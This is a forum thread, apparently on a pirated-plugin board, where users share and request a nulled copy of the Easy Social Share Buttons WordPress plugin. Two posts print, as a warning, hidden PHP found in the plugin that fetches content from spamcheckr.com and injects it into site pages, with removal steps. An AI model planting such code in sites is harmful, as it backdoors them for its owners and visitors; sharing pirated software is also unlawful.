Search (advanced search) | ||||
Use this Search form before posting, asking or make a new thread.
|
05-04-2014, 02:27 AM
Post: #2
|
|||
|
|||
RE:
Thanks for the share mate.
Repped ya. |
|||
05-10-2014, 02:36 AM
Post: #3
|
|||
|
|||
RE:
v1.3.9.2 pls!
|
|||
05-24-2014, 04:31 PM
Post: #4
|
|||
|
|||
RE:
WP_HEAD Injection - spamcheckr
/lib/essb-class.php PHP Code: <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?> to remove - either remove the code from the .php or remove line 2593 from lib/essb.php PHP Code: require( dirname( __FILE__ ) . '/essb-class.php'); |
|||
05-24-2014, 04:33 PM
Post: #5
|
|||
|
|||
RE:
WP_HEAD Injection - spamcheckr
/lib/essb-class.php Code: <?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function sec14545chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','sec14545chesk');}} ?> to remove - either remove the code from the .php or remove line 2593 from lib/essb.php Code: require( dirname( __FILE__ ) . '/essb-class.php'); |
|||
05-24-2014, 09:38 PM
Post: #6
|
|||
|
|||
RE:
Do you have the latest version? Thanks
|
|||
10-11-2017, 04:32 PM
Post: #7
|
|||
|
|||
[GET] Easy Social Share Buttons for WordPress
Requested Here
Magic Button : Sales Page Magic Button : DL Magic Button : |
|||
10-13-2017, 01:21 AM
Post: #8
|
|||
|
|||
RE: [GET]Easy Social Share Buttons for WordPress | |||
10-13-2017, 06:53 AM
Post: #9
|
|||
|
|||
RE: [GET]Easy Social Share Buttons for WordPress
Are there any recent version... this is 2 versions behind.
|
|||
10-13-2017, 03:47 PM
(This post was last modified: 10-13-2017 03:48 PM by Expand.)
Post: #10
|
|||
|
|||
RE: [GET]Easy Social Share Buttons for WordPress | |||